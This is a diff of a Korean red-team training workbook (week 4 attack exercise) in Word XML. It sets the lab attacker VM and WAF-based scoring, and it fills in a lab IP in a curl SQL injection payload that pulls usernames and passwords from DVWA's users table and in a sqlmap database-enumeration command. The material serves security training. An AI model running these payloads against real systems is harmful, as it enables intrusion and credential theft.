--- a/contents/battle-workbook/attack-w04.docx
+++ b/contents/battle-workbook/attack-w04.docx
@@ -89,22 +89,7 @@
           <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">▸ 공격자 위치: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>망 외부 공격자(attacker-ext)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>. 외부 명령 미수집 → Red 채점은 대상 WAF(ModSec) 흔적으로.</w:t>
+        <w:t>▸ 공격자 위치(중요)</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -114,7 +99,82 @@
           <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>▸ '우회 성공' 은 페이로드가 403 이 아닌 200 으로 통과했는가로 판단(접근/audit 로그의 응답코드).</w:t>
+        <w:t xml:space="preserve">이 주차의 Red 미션은 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>망 외부 공격자 VM(192.168.0.202)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 기준이다. el34 는 공격자의 출처 IP를</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>fw→ips→web(WAF) 전 계층에 그대로 보존하므로(HAProxy 제거·NAT 출처소실 없음), Red 채점은 **대상</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>(el34) 인프라에 남은 탐지 흔적</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(WAF audit / IPS / 호스트 계정·포트)과 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>출처 IP(192.168.0.202)·</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>고유 태그 상관</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">으로 한다. 반드시 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>고유 태그**를 붙여 앰비언트 노이즈와 구분되게 한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -164,9 +224,9 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s "http://&lt;대상_공개IP&gt;:8080/vulnerabilities/sqli/?id=1' UNION SELECT user,password FROM users-- -&amp;Submit=Submit" --cookie "security=low; PHPSESSID=test"</w:t>
+        <w:t>curl -s "http://192.168.0.161:8080/vulnerabilities/sqli/?id=1' UNION SELECT user,password FROM users-- -&amp;Submit=Submit" --cookie "security=low; PHPSESSID=test"</w:t>
         <w:br/>
-        <w:t>sqlmap -u "http://&lt;대상_공개IP&gt;:8080/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=test" --batch --dbs</w:t>
+        <w:t>sqlmap -u "http://192.168.0.161:8080/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=test" --batch --dbs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -239,7 +299,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -273,7 +333,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -461,7 +521,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -495,7 +555,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -650,7 +710,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -684,7 +744,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -887,7 +947,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -921,7 +981,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1086,7 +1146,7 @@
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>▶ 실행 결과 화면 (스크린샷 붙여넣기)</w:t>
+        <w:t>▶ 실행 결과 (출력/스크린샷)</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1120,7 +1180,7 @@
                 <w:color w:val="AAAAAA"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>여기에 결과 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
+              <w:t>여기에 결과 출력을 적거나 스크린샷을 붙여넣으세요 (커서를 두고 Ctrl+V)</w:t>
             </w:r>
           </w:p>
         </w:tc>
